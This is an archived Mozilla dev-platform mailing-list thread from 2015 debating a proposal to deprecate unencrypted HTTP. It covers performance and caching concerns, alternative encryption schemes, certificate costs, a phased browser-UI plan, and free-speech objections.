Definitely. The resistance in this thread is NOT about "people > >> against security", but 1. we want to be able to choose 2. if we > >> choose safe, we want that choice to be easy to activate. > > > > I'd have it the other way. If you even assume choice should be possible > > then: > > > > 1) We want to be able to choose > > 2) If we choose unsafe, we want that choice to be relatively hard to > > activate. > > > > In other words, "safe" should be the default. > > > > Gerv > > _______________________________________________ > > dev-platform mailing list > > dev-platform@lists.mozilla.org > > https://lists.mozilla.org/listinfo/dev-platform > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
As a non-tech person, the only thing I know is https means my browser runs = even slower on DSL, which is all that is available in many rural areas. Wou= ld this not mean that I'd be back to dial-up times to load a story or post,= all of which are larded up with ads and videos these days? At 7 mbps tops,= my browsing is already difficult. =20 Meanwhile: "Deprecate" it?? Has anyone in the tech community used an Englis= h dictionary? To deprecate Http would mean to speak badly of it. Or disapp= rove of it. I think you mean you want to abolish it, pressure it out of exi= stence, or create a disincentive to use it.=20
![]() |
0 |
![]() |
On Fri, Apr 17, 2015 at 6:13 PM, <andrewnemethy@gmail.com> wrote: > As a non-tech person, the only thing I know is https means my browser runs even slower on DSL. This has already been addressed earlier in the thread. HTTPS has negligible performance impact. See e.g.: https://istlsfastyet.com/ > Meanwhile: "Deprecate" it?? Has anyone in the tech community used an English dictionary? http://en.wikipedia.org/wiki/Deprecation#Software_deprecation -- https://annevankesteren.nl/
![]() |
0 |
![]() |
On 2015-04-17 12:20 PM, Anne van Kesteren wrote: > On Fri, Apr 17, 2015 at 6:13 PM, <andrewnemethy@gmail.com> wrote: >> As a non-tech person, the only thing I know is https means my browser runs even slower on DSL. > This has already been addressed earlier in the thread. HTTPS has > negligible performance impact. See e.g.: > > https://istlsfastyet.com/ I don't see where that document speaks to the impact of TLS on caching proxies, which I'm guessing is the source of the performance hit Andrew mentions. It's been a while since I've looked, but in Canada (and probably other geographically large countries) the telcos/ISP with large exurban/rural client bases used to use caching proxies a lot. - mhoye
![]() |
0 |
![]() |
On 04/17/2015 09:46 AM, Mike Hoye wrote: > On 2015-04-17 12:20 PM, Anne van Kesteren wrote: >> On Fri, Apr 17, 2015 at 6:13 PM, <andrewnemethy@gmail.com> wrote: >>> As a non-tech person, the only thing I know is https means my browser >>> runs even slower on DSL. >> This has already been addressed earlier in the thread. HTTPS has >> negligible performance impact. See e.g.: >> >> https://istlsfastyet.com/ > I don't see where that document speaks to the impact of TLS on caching > proxies, which I'm guessing is the source of the performance hit Andrew > mentions. > > It's been a while since I've looked, but in Canada (and probably other > geographically large countries) the telcos/ISP with large exurban/rural > client bases used to use caching proxies a lot. From my past experience with satellite based connections https was appreciably slower than http. I don't know how much of the affect was due to the loss of the caching proxy or how much was due to the latency+handshake issue. This was also several years ago and I don't have experience with the improved networking in Firefox over satellite . In third world countries, such as the United States, many people in rural areas are limited to satellite base connections and may be adversely affected by the move to encrypted connections. This isn't to say we shouldn't move to encryption, just that the network experience in major metropolitan areas isn't indicative of what someone in rural Virginia might experience for example. /bc
![]() |
0 |
![]() |
On Fri, Apr 17, 2015 at 6:46 PM, Mike Hoye <mhoye@mozilla.com> wrote: > I don't see where that document speaks to the impact of TLS on caching > proxies, which I'm guessing is the source of the performance hit Andrew > mentions. > > It's been a while since I've looked, but in Canada (and probably other > geographically large countries) the telcos/ISP with large exurban/rural > client bases used to use caching proxies a lot. As I said early on in this thread, this claim often comes up, but is never backed up. Where is the research that shows we need public caching proxies? -- https://annevankesteren.nl/
![]() |
0 |
![]() |
On Fri, Apr 17, 2015 at 11:22 AM, Anne van Kesteren <annevk@annevk.nl> wrote: > As I said early on in this thread, this claim often comes up, but is > never backed up. Where is the research that shows we need public > caching proxies? This is early days, but I'm working with a partner on two things: - working out how to cache https resources - working out if it's worthwhile doing I can share what material I have on the topic; it's very rough right now and we have no actual data, but I expect the project to be in a better shape as things progress. This is all part of the overall plan to make HTTPS as usable as possible. The latter question is a real concern, but we won't know until we go and collect some data. When we get measurements for these sorts of things, it's usually from services that have the resources to acquire the measurements. At the same time, those services likely have the resources to have a CDN and so probably will have less need for caches.
![]() |
0 |
![]() |
> The latter question is a real concern, but we won't know until we go > and collect some data. When we get measurements for these sorts of > things, it's usually from services that have the resources to acquire > the measurements. At the same time, those services likely have the > resources to have a CDN and so probably will have less need for > caches. It seems the right people to work with on this are the people at rural/edge= /mobile ISPs, as these are the people who will know the size of their cache= s, the hit rates, the amount of bandwidth they take off their transit links= and the amount of money they'd have to raise from their customers to pay f= or increased peering/transit costs if their caching proxies all broke (extr= apolated out over the expected transition time, of course). Providers of web services themselves don't seem in a good position to calcu= late the value of caching http proxies, as they aren't the ones benefiting = except in an indirect latency based way.
![]() |
0 |
![]() |
On 18/04/2015 00:13, andrewnemethy@gmail.com wrote: > Meanwhile: "Deprecate" it?? Has anyone in the tech community used an > English dictionary? To deprecate Http would mean to speak badly of > it. Or disapprove of it. I think you mean you want to abolish it, > pressure it out of existence, or create a disincentive to use it. "Deprecate" is a term of art in the IT world. http://en.wikipedia.org/wiki/Deprecation http://www.thefreedictionary.com/deprecated 3. Computers To mark (a component of a software standard) as obsolete to warn against its use in the future so that it may be phased out. Thesaurus: An educated dinosaur Phil -- Philip Chee <philip@aleytys.pc.my>, <philip.chee@gmail.com> http://flashblock.mozdev.org/ http://xsidebar.mozdev.org Guard us from the she-wolf and the wolf, and guard us from the thief, oh Night, and so be good for us to pass.
![]() |
0 |
![]() |
On Wed, Apr 15, 2015 at 6:13 PM, Karl Dubost <kdubost@mozilla.com> wrote: > Socially, eavesdropping is part of our daily life. We go to a caf=C3=A9, = we are > having a discussion and people around you may listen what you are saying. > You read a book in the train, a newspaper and people might see what you a= re > reading. > =E2=80=8BThe HTTP equivalent to those is a "passive MITM"--listening in (bu= t unlike a few strangers around you in the cafe that might hear a few words it's a global surveillance regime storing every word for years). That's problem enough, but using HTTP also allows "active MITM" where the attacker intercepts your words and changes them so that your companion hears something different -- perhaps instead of ordering 2 boxes of Girl Scout cookies you're heard to say 20, and that they should be delivered to the house across the street. Or instead of proposing to your SO you're heard to break up with them because you can't stand their mother (oh hey, is that your ex over in the corner with the computer?). -Dan Veditz
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote: > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security= .. I think server side SSL certificates should be deprecated as a means to enc= rypt a connection. Ideally this is what should happen: 1. User downloads a browser (be it Firefox, Chrome, Opera, etc.) securely (= https?) from the official download location. 2. Upon installation a private key is created for that browser installation= and signed by the browser's certificate server. 3. When the user later connect to a server that support automatic encryptio= n, the browser sends a (public) session key that the server should use, thi= s key is signed with the browser installation key, the server can verify th= e signature and that this key is not modified by checking the certificate s= erver. 4. The server exchanges it's session key with the browser. 5. A secure/encrypted connection is now possible. I know, not that well explained and over simplified. But the concept is hopefully clear, but in case it's not... This is today's server certificates system but in reverse. This concept does not replace https as it is today, but does allow "free" e= ncrypted connections. Web designers, hosting companies etc only need to ensure their server softw= are is up to date and are able to support this. The benefit is that there is no server side certificates needed to establis= h a encrypted connection. The browser/client installation certificate can easily be changed each time= a browser is updated. And can be set to expire within a certain number of = months. Not sure what to call this concept. "Reverse-HTTPS" maybe? RHTTPS for short= ? Traditional serverside certificates are still needed, especially the "green= bar" ones. And free basic ones like StartSSL gives out are still of use, to allow old = browsers to use HTTPS, and to support a fallback in case a browser certific= ate has expired (and still allow a secure connection). The issue today (even with free certificates like StartSSL gives out) is th= at webmasters ans hosting companies have to do a yearly dance to update the= certificates. And not all hosting companies support HTTPS for all their packages. Sites that make some profit can probably afford to pay for the extra HTTPS = feature and pay for a certificate. Myself I'm lucky in that my host provides free HTTPS support for the partic= ular package I have (though not for the smallest package). My concept has a flaw though. Browser makers need to set up their own certi= ficate server to sign the generated browser installation keys. And server software (Apache, nginx, etc.) need to support a type of RHTTPS = so they can send a session key to the browser. The benefit though is that servers do not need a certificate installed to c= reate a encrypted connection. Further security could be built on top of this where the server or client o= r both have authenticated certificate (so that there is not only a encrypte= d connection but also identified server and client) A concept like RHTTPS would allow a slow migration with no direct need for = webmasters nor browser users to change anything themselves, with zero cost = to webmasters/hosters nor the end users.
![]() |
0 |
![]() |
Very briefly: On 21/04/15 12:43, skuldwyrm@gmail.com wrote: > 1. User downloads a browser (be it Firefox, Chrome, Opera, etc.) > securely (https?) from the official download location. 2. Upon > installation a private key is created for that browser installation > and signed by the browser's certificate server. This makes checking in with the browser maker a necessary prerequisite for secure connections. That has problems. > 3. When the user > later connect to a server that support automatic encryption, the > browser sends a (public) session key that the server should use, this > key is signed with the browser installation key, the server can > verify the signature and that this key is not modified by checking > the certificate server. What you just built is a unique identifier for every browser which can be tracked across sites. > 4. The server exchanges it's session key with > the browser. 5. A secure/encrypted connection is now possible. Except that the browser has not yet identified the site. It is important for the user to check the site is genuine before the user sends any important information to it. > The benefit is that there is no server side certificates needed to > establish a encrypted connection. They are needed if the user wants to have any confidence in who they are actually talking to. Gerv
![]() |
0 |
![]() |
On 2015-04-21 6:43 AM, skuldwyrm@gmail.com wrote: > I know, not that well explained and over simplified. But the concept > is hopefully clear, but in case it's not... For what it's worth, a lot of really smart people have been thinking about this problem for a while and there aren't a lot of easy buckets left on this court. Even if we had the option of starting with a clean slate it's not clear how much better we could do, and scrubbing the internet's security posture down to the metal and starting over isn't really an option. We have to work to improve the internet as we find it, imperfections and tradeoffs and all. Just to add to this discussion, one point made to me in private was that HTTPS-everywhere defangs the network-level malware-prevention tools a lot of corporate/enterprise networks use. My reply was that those same companies have tools available to preinstall certificates in browsers they deploy internally - most (all?) networking-hardware companies will sell you tools to MITM your own employees - which would be an acceptable solution in those environments where that's considered an acceptable solution, and not a thing to block on. - mhoye
![]() |
0 |
![]() |
On Tue, Apr 21, 2015 at 9:56 AM, Mike Hoye <mhoye@mozilla.com> wrote: > On 2015-04-21 6:43 AM, skuldwyrm@gmail.com wrote: > >> I know, not that well explained and over simplified. But the concept is >> hopefully clear, but in case it's not... >> > For what it's worth, a lot of really smart people have been thinking about > this problem for a while and there aren't a lot of easy buckets left on > this court. Even if we had the option of starting with a clean slate it's > not clear how much better we could do, and scrubbing the internet's > security posture down to the metal and starting over isn't really an > option. We have to work to improve the internet as we find it, > imperfections and tradeoffs and all. > > Just to add to this discussion, one point made to me in private was that > HTTPS-everywhere defangs the network-level malware-prevention tools a lot > of corporate/enterprise networks use. My reply was that those same > companies have tools available to preinstall certificates in browsers they > deploy internally - most (all?) networking-hardware companies will sell you > tools to MITM your own employees - which would be an acceptable solution in > those environments where that's considered an acceptable solution, and not > a thing to block on. > Yeah, I agree this is an issue, but not a blocker. It's already a problem for the ~65% of web transactions that are already encrypted, and people are already thinking about how to manage these enterprise roots better / improve user visibility. --Richard > > - mhoye > > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
Just out of curiosity, is there an equivalent of: python -m SimpleHTTPServer in the TLS world currently, or is any progress being made towards that?
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > In recent months, there have been statements from IETF [1], IAB [2], W3C > [3], and even the US Government [4] calling for universal use of > encryption, which in the case of the web means HTTPS. >=20 > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security= .. > Broadly speaking, this plan would entail limiting new features to secure > contexts, followed by gradually removing legacy features from insecure > contexts. Having an overall program for HTTP deprecation makes a clear > statement to the web community that the time for plaintext is over -- it > tells the world that the new web uses HTTPS, so if you want to use new > things, you need to provide security. Martin Thomson and I drafted a > one-page outline of the plan with a few more considerations here: >=20 > https://docs.google.com/document/d/1IGYl_rxnqEvzmdAP9AJQYY2i2Uy_sW-cg9QI9= ICe-ww/edit?usp=3Dsharing >=20 > Some earlier threads on this list [5] and elsewhere [6] have discussed > deprecating insecure HTTP for "powerful features". We think it would be = a > simpler and clearer statement to avoid the discussion of which features a= re > "powerful" and focus on moving all features to HTTPS, powerful or not. >=20 > The goal of this thread is to determine whether there is support in the > Mozilla community for a plan of this general form. Developing a precise > plan will require coordination with the broader web community (other > browsers, web sites, etc.), and will probably happen in the W3C. >=20 > Thanks, > --Richard I think this is very very bad idea. There are many resources which are not = worth being protected by HTTPS. Moreover, it doesn't make sense e.g. for re= sources in the local network. And there are devices which CANNOT use HTTPS,= e.g. a webserver on a 8-bit MCU (like http://tuxgraphics.org/electronics/2= 00611/article06111.shtml). So, please, let it be the responsibility of the webmaster and/or the user w= hether to use HTTP or HTTPS! P.
![]() |
0 |
![]() |
On Thursday, April 23, 2015 at 11:47:14 PM UTC-4, voracity wrote: > Just out of curiosity, is there an equivalent of: > > python -m SimpleHTTPServer > > in the TLS world currently, or is any progress being made towards that? openssl req -new -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem openssl s_server -accept 8000 -key key.pem -cert cert.pem -HTTP Not quite as simple, but not far off. With the above, you can get <https://localhost:8000/>, as long as you're willing to click through a certificate warning.
![]() |
0 |
![]() |
On Friday, April 24, 2015 at 1:03:00 AM UTC-4, butrus...@gmail.com wrote: > On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote: > > There's pretty broad agreement that HTTPS is the way forward for the we= b. > > In recent months, there have been statements from IETF [1], IAB [2], W3= C > > [3], and even the US Government [4] calling for universal use of > > encryption, which in the case of the web means HTTPS. > >=20 > > In order to encourage web developers to move from HTTP to HTTPS, I woul= d > > like to propose establishing a deprecation plan for HTTP without securi= ty. > > Broadly speaking, this plan would entail limiting new features to secu= re > > contexts, followed by gradually removing legacy features from insecure > > contexts. Having an overall program for HTTP deprecation makes a clear > > statement to the web community that the time for plaintext is over -- i= t > > tells the world that the new web uses HTTPS, so if you want to use new > > things, you need to provide security. Martin Thomson and I drafted a > > one-page outline of the plan with a few more considerations here: > >=20 > > https://docs.google.com/document/d/1IGYl_rxnqEvzmdAP9AJQYY2i2Uy_sW-cg9Q= I9ICe-ww/edit?usp=3Dsharing > >=20 > > Some earlier threads on this list [5] and elsewhere [6] have discussed > > deprecating insecure HTTP for "powerful features". We think it would b= e a > > simpler and clearer statement to avoid the discussion of which features= are > > "powerful" and focus on moving all features to HTTPS, powerful or not. > >=20 > > The goal of this thread is to determine whether there is support in the > > Mozilla community for a plan of this general form. Developing a precis= e > > plan will require coordination with the broader web community (other > > browsers, web sites, etc.), and will probably happen in the W3C. > >=20 > > Thanks, > > --Richard >=20 >=20 > I think this is very very bad idea. There are many resources which are no= t worth being protected by HTTPS. Moreover, it doesn't make sense e.g. for = resources in the local network. And there are devices which CANNOT use HTTP= S, e.g. a webserver on a 8-bit MCU (like http://tuxgraphics.org/electronics= /200611/article06111.shtml). >=20 > So, please, let it be the responsibility of the webmaster and/or the user= whether to use HTTP or HTTPS! To be clear, we are not proposing to remove that choice, only limiting the = set of web features that non-HTTPS pages can use. There are also plenty of small platforms that can support HTTPS. Slightly = bigger than what you're talking about, but still small. http://hypernephelist.com/2014/08/19/https_on_arduino_yun.html --Richard >=20 > P.
![]() |
0 |
![]() |
On 2015-04-24 1:02 AM, butrus.butrus@gmail.com wrote: > I think this is very very bad idea. There are many resources which are > not worth being protected by HTTPS. This is about protecting people, not resources. I think an eight-year-old article about a hacked-up, homebrew 8-bit webserver is the edgiest of edge case I've ever seen, but there's a seed of an idea in there about embedded devices that's important. The common case there, though, will be home users who do not know the first thing about network security but have a house full of wireless embedded devices and appliances, not the lo-fi hacker community who you'd expect to have a better sense of what they're in for. In that context HTTPS is a security measure you expect to be there by default, as basic and universal as the locks on your front door. - mhoye
![]() |
0 |
![]() |
On Tuesday, April 21, 2015 at 2:56:21 PM UTC+2, Gervase Markham wrote: > Very briefly: >=20 > On 21/04/15 12:43, Roger H=E5gensen wrote: > > 1. User downloads a browser (be it Firefox, Chrome, Opera, etc.) > > securely (https?) from the official download location. 2. Upon > > installation a private key is created for that browser installation > > and signed by the browser's certificate server.=20 >=20 > This makes checking in with the browser maker a necessary prerequisite > for secure connections. That has problems. How so? Certificates have to be checked today as well (if they have been re= vocated or not). Also, it would only be at installation time for the user. The server itself would heck if it's been revocated or not. StartSSL uses client certificates for logins, so does several other sites. If you an have a client-server connection where only the server has a certi= fiate then the opposite is also possible, where the client-server connectio= n is secured with only the client having a certificate. > > 3. When the user > > later connect to a server that support automatic encryption, the > > browser sends a (public) session key that the server should use, this > > key is signed with the browser installation key, the server can > > verify the signature and that this key is not modified by checking > > the certificate server. >=20 > What you just built is a unique identifier for every browser which can > be tracked across sites. How can this be tracked? This can be tracked just like any other client cer= tificate can be tracked currently, no difference. > > 4. The server exchanges it's session key with > > the browser. 5. A secure/encrypted connection is now possible. >=20 > Except that the browser has not yet identified the site. It is important > for the user to check the site is genuine before the user sends any > important information to it. >=20 > > The benefit is that there is no server side certificates needed to > > establish a encrypted connection.=20 >=20 > They are needed if the user wants to have any confidence in who they are > actually talking to. DNSSEC exists and should help mitigate who you are talking to issue. Also certificates have been falsified (didn't Mozilla just untrust all cert= ificates by a certain certificate issuer recently that allowed fake Google.= com certificates to be made?) Also with certificates like the free ones from StartSSL the only site ident= ity you can see is "identity not verified" yet the connection is still HTTP= S. Just look at https://skuldwyrm.no/ which uses a free StartSSL certificat= e. Do note however that this .no domain do have DNSSEC enabled (does all lates= t browsers support that?) So one can be relatively sure to be talking to skuldwyrm.no without https. What I'm proposing is no worse than automatic domain verified certificates = currently are. The important thing is that the connection is encrypted here. Not whether the site is trusted or not. Heck, there are sites with a "green url bar" that do rip people off, so tru= st or ensuring you do'nt get fooled is not automagic with any type of HTTPS= in that regard.
![]() |
0 |
![]() |
On Tuesday, April 21, 2015 at 3:56:31 PM UTC+2, Mike Hoye wrote: > On 2015-04-21 6:43 AM, Roger H=E5gensen wrote: > > I know, not that well explained and over simplified. But the concept=20 > > is hopefully clear, but in case it's not... > For what it's worth, a lot of really smart people have been thinking=20 > about this problem for a while and there aren't a lot of easy buckets=20 > left on this court. Even if we had the option of starting with a clean=20 > slate it's not clear how much better we could do, and scrubbing the=20 > internet's security posture down to the metal and starting over isn't=20 > really an option. We have to work to improve the internet as we find it,= =20 > imperfections and tradeoffs and all. How about HTTP/2 ? Also a lot of smart minds completely ignored HTTP Digest Authentication for= years, allowing Basic (plain text) password to be sent when login in on si= tes. I hate plain text logins, how many blogs and forums out there have plain te= xt logins right now? The number is scary I'm sure. MITM attacks are one thing, what is worse are network eavesdropping, login = to your blog or forum from a Cafe and you are screwed basically. IT has bee= n shown that despite using WPA2 to the router, others on the same router ca= n catch packets and decrypt them. And then they have your login/password. Now when I make logins for web projects I use a Javascript client side base= d HMAC and a challenge-response so I do not even send the HMAC/hash over th= e network. The server gives the javascript/client a challenge and a nonce, the passwor= d which the user knows and server knows (actually the server only knows a h= mac of the pass and salt) is used with the challenge and then the result is= sent back as a answer. An eaves dropper will not be able to get the password. Now, there are other attacks that could be used like session exploits but t= his is true even for HTTPS connections. And a javascript/client solution like this is open to a MITTM attack since = it's not encrypted or signed in any way (code signing certificates are even= more expensive than site certificates). I'd like to see a Client based HMAC Challenge-Responsive built in and a way= for a browser and a serverside script to establish a encrypted connection = without he need for certificates. This would solve the plaintext login headache, and would be attractive to s= ites that only have HTTP (no HTTPS option) but has for example PHP support = or some other scripting language. HTTP/2 could be extended to improve the way HTTP Digest Authentication work= s, adding a HMAC(PSWD+SALT) + Challenge(NONCE) =3D Response(HASH) method.
![]() |
0 |
![]() |
This is a digression, but it touches on an important question that others are asking in response to this general push [1]. Fundamentally, better client authentication doesn't do anything to help make the web a more secure place (in any of the dimensions that we're primarily concerned about in this thread, anyway). They can actually make things worse by creating more ways of tracking users. On Fri, Apr 24, 2015 at 3:28 PM, Roger H=C3=A5gensen <skuldwyrm@gmail.com> = wrote: > How about HTTP/2 ? > Also a lot of smart minds completely ignored HTTP Digest Authentication f= or years, allowing Basic (plain text) password to be sent when login in on = sites. The problems with both digest and basic are primarily poor UX. This is well-known. From a security perspective, both are pretty poor, but since the UX was so poor they weren't used that much. Consequently, they were neglected. HTTP APIs have been used more in recent years, so we're seeing more demand for better mechanisms that are native to the protocol. OAuth is one such thing. And new authentication methods are being developed in the httpauth working group in the IETF [2]. Participation is open there, feel free to sign up. You can also look into essentially proprietary systems like hawk [3], which Mozilla services have decided they quite like. > HTTP/2 could be extended to improve the way HTTP Digest Authentication wo= rks, adding a HMAC(PSWD+SALT) + Challenge(NONCE) =3D Response(HASH) method. HTTP/2 is not the place for authentication improvements. We specifically removed the mechanism Google invented for SPDY early in the HTTP/2 process for that reason (and others). The mechanisms cited above all work perfectly well with HTTP/1.1, and that's still considered an important property. [1] http://www.w3.org/DesignIssues/Security-ClientCerts.html [2] https://tools.ietf.org/wg/httpauth [3] https://github.com/hueniverse/hawk
![]() |
0 |
![]() |
On 24/04/15 23:06, Roger Hågensen wrote: > On Tuesday, April 21, 2015 at 2:56:21 PM UTC+2, Gervase Markham > wrote: >> This makes checking in with the browser maker a necessary >> prerequisite for secure connections. That has problems. > > How so? Certificates have to be checked today as well (if they have > been revocated or not). Yes, and this has privacy problems too. Hence the move towards OCSP stapling, which does not. >>> 3. When the user later connect to a server that support automatic >>> encryption, the browser sends a (public) session key that the >>> server should use, this key is signed with the browser >>> installation key, the server can verify the signature and that >>> this key is not modified by checking the certificate server. >> >> What you just built is a unique identifier for every browser which >> can be tracked across sites. > > How can this be tracked? This can be tracked just like any other > client certificate can be tracked currently, no difference. Right. And that's one reason why people don't use client certificates! :-) Client certificates allow users to be tracked with 100% accuracy across every site which requests the cert. Which is why IIRC, by default, users are prompted in Firefox before sending a client certificate. > DNSSEC exists and should help mitigate who you are talking to issue. And is not fully deployed, and certainly not where it's most needed, at the endpoints. > Also certificates have been falsified (didn't Mozilla just untrust > all certificates by a certain certificate issuer recently that > allowed fake Google.com certificates to be made?) "Sometimes certs are misissued -> certs can never be trusted" is not good logic. > Also with certificates like the free ones from StartSSL the only site > identity you can see is "identity not verified" yet the connection is > still HTTPS. The domain name is the site identity for a DV certificate. > DNSSEC enabled (does all latest browsers support that?) So one can be > relatively sure to be talking to skuldwyrm.no without https. Perhaps, in this one case, if Firefox checked DNSSEC, which it doesn't. But you would have no guarantee of content integrity without HTTPS - an attacker could alter the content during transmission. > What I'm proposing is no worse than automatic domain verified > certificates currently are. Then why re-engineer the entire secure Internet just to get something which is "no worse"? Gerv
![]() |
0 |
![]() |
Here's two relevant Bugzilla bugs: Self-signed certificates are treated as errors: https://bugzilla.mozilla.or= g/show_bug.cgi?id=3D431386 Switch generic icon to negative feedback for non-https sites: https://bugzi= lla.mozilla.org/show_bug.cgi?id=3D1041087 Here's a proposed way of phasing this plan in over time: 1. Mid-2015: Start treating self signed certificates as unencrypted connect= ions (i.e. stop showing a warning, but the UI would just show the globe ico= n, not the lock icon). This would allow website owners to choose to block p= assive surveillance without causing any cost to them or any problems for th= eir users. 2. Late-2015: Switch the globe icon for http sites to a gray unlocked lock.= The self signed certs would still be the globe icon. The would incentivize= website owners to at least start blocking passive surveillance if they wan= t to keep the same user experience as previous. Also, this new icon wouldn'= t be loud or intrusive to the user. 3. Late-2016: Change the unlocked icon for http sites to a yellow icon. Hop= efully, by the end of 2016, Let's Encrypt has taken off and has a lot of fr= ameworks like wordpress including tutorials on how to use it. This increase= d uptake of free authenticated https, plus the ability to still use self-si= gned certs for unauthenticated https (remember, this still blocks passive a= dversaries), would allow website owners enough alternative options to start= switching to https. The yellow icon would push most over the edge. 4. Late-2017: Switch the unlocked icon for http to red. After a year of yel= low, most websites should already have switched to https (authenticated or = self-signed), so now it's time to drive the nail in the coffin and kill htt= p on any production site with a red icon. 5. Late-2018: Show a warning for http sites. This experience would be simil= ar to the self-signed cert experience now, where users have to manually cho= ose to continue. Developers building websites would still be able to choose= to continue to load their dev sites, but no production website would in th= eir right mind choose to use http only.
![]() |
0 |
![]() |
Whoopie... I can jump through hoops and make TLS fast. Why should I have t= o? The user should be the decision maker. If they want to visit an unsecur= ed HTTP site of cat videos... let them. IF a hacker wants to edit those cat= videos while in transit... LET THEM. Why strong-arm everyone into using H= TTPS when it is not necessary? This is an immensely expensive (man-hours) = solution to a non-problem.
![]() |
0 |
![]() |
On Thursday, April 30, 2015 at 5:57:13 PM UTC-7, dia...@gmail.com wrote: > 1. Mid-2015: Start treating self signed certificates as unencrypted conne= ctions (i.e. stop showing a warning, but the UI would just show the globe i= con, not the lock icon). This would allow website owners to choose to block= passive surveillance without causing any cost to them or any problems for = their users. In Mid-2015 we will be launching Let's Encrypt to issue free certificates u= sing automated protocols, so we shouldn't need to do this.
![]() |
0 |
![]() |
On Thursday, April 30, 2015 at 6:02:44 PM UTC-7, peter.e...@gmail.com wrote= : > On Thursday, April 30, 2015 at 5:57:13 PM UTC-7, dia...@gmail.com wrote: >=20 > > 1. Mid-2015: Start treating self signed certificates as unencrypted con= nections (i.e. stop showing a warning, but the UI would just show the globe= icon, not the lock icon). This would allow website owners to choose to blo= ck passive surveillance without causing any cost to them or any problems fo= r their users. >=20 > In Mid-2015 we will be launching Let's Encrypt to issue free certificates= using automated protocols, so we shouldn't need to do this. The thing that may actually be implemented, which is similar to what you wa= nt, is the HTTP opportunistic encryption feature of HTTP/2.0. That's stric= tly better than unencrypted HTTP (since it is safe against passive attacks)= and strictly worse than authenticated HTTPS (because it fails instantly ag= ainst active attacks). So if clients implement it, it has a natural ordina= l position in the UI and feature-access hierarchy. If the Let's Encrypt launch goes as planned, it would probably be a mistake= to encourage sites to use unauthenticated opportunistic HTTP encryption.
![]() |
0 |
![]() |
I think this is a grave mistake. The simplicity of the web was the primary factor in its explosive growth. B= y putting up barriers to entry you are discouraging experimentation, discou= raging one-off projects, and discouraging leaving inactive websites running= (as keeping certs up to date will be a yearly burden). I understand that there are proposed solutions to these problems but they d= on't exist today and won't be ubiquitous for a while. That *has* to come f= irst. Nothing is more important than the free speech the web allows. Not ev= en security. That the leading minds of the web no longer value this makes me feel like a= n old fogey, an incredibly sad one.
![]() |
0 |
![]() |
On Thu, Apr 30, 2015 at 5:57 PM, <diafygi@gmail.com> wrote: > Here's two relevant Bugzilla bugs: > > Self-signed certificates are treated as errors: > https://bugzilla.mozilla.org/show_bug.cgi?id=431386 > > Switch generic icon to negative feedback for non-https sites: > https://bugzilla.mozilla.org/show_bug.cgi?id=1041087 > > Here's a proposed way of phasing this plan in over time: > > 1. Mid-2015: Start treating self signed certificates as unencrypted > connections (i.e. stop showing a warning, but the UI would just show the > globe icon, not the lock icon). This would allow website owners to choose > to block passive surveillance without causing any cost to them or any > problems for their users. > I think you're over-focusing on the lock icon and not thinking enough about the referential semantics. The point of the https: URI is that it tells the browser that this is supposed to be a secure connection and the browser needs to enforce this regardless of the UI it shows. To give a concrete example, say the user enters his password in a form that is intended to be submitted over HTTPS and the site presents a self-signed certificate. If the browser send the password, then it has possible compromised the user's password even if it subsequently doesn't show the secure UI (because the attacker could supply a self-signed certificate). -Ekr
![]() |
0 |
![]() |
restriction might be: unless website is severing from local network, 1. you can't use a password input(treat it equal to normal text input). 2. you can't set cookie. 3. javascript is disabled. A header is provided to prevent a content from https being load to a http page. (maybe work like same-origin.) Insecure content never load to a secure page.(unless you open advanced configure) P.S.:And finally, accept Cacert or a easy to use CA.
![]() |
0 |
![]() |
On Thu, Apr 30, 2015 at 10:49 PM, Matthew Phillips <phillipsm2@gmail.com> wrote: > I understand that there are proposed solutions to these problems but they don't exist today and won't be ubiquitous for a while. That *has* to come first. Nothing is more important than the free speech the web allows. Not even security. This is a false choice... you cannot have free speech without safe spaces. Many, many have written about this, e.g., https://cdt.org/files/2015/02/CDT-comments-on-the-use-of-encryption-and-anonymity-in-digital-communcations.pdf -- Joseph Lorenzo Hall Chief Technologist Center for Democracy & Technology 1634 I ST NW STE 1100 Washington DC 20006-4011 (p) 202-407-8825 (f) 202-637-0968 joe@cdt.org PGP: https://josephhall.org/gpg-key fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
![]() |
0 |
![]() |
Of course you know this is not true. There have been many petabytes of free speech floating around on the internet for the last 2 decades, despite not having mandatory https. All mandatory https will do is discourage people from participating in speech unless they can afford the very high costs (both in dollars and in time) that you are now suggesting be required. Or worse, handing over their speech to a big company (like the ones many people in this discussion work for) instead of hosting it themselves. This is the antithesis of what the web has always, and should, be. On Fri, May 1, 2015, at 07:53 AM, Joseph Lorenzo Hall wrote: > On Thu, Apr 30, 2015 at 10:49 PM, Matthew Phillips <phillipsm2@gmail.com> > wrote: > > I understand that there are proposed solutions to these problems but they don't exist today and won't be ubiquitous for a while. That *has* to come first. Nothing is more important than the free speech the web allows. Not even security. > > This is a false choice... you cannot have free speech without safe > spaces. Many, many have written about this, e.g., > https://cdt.org/files/2015/02/CDT-comments-on-the-use-of-encryption-and-anonymity-in-digital-communcations.pdf > > -- > Joseph Lorenzo Hall > Chief Technologist > Center for Democracy & Technology > 1634 I ST NW STE 1100 > Washington DC 20006-4011 > (p) 202-407-8825 > (f) 202-637-0968 > joe@cdt.org > PGP: https://josephhall.org/gpg-key > fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
![]() |
0 |
![]() |
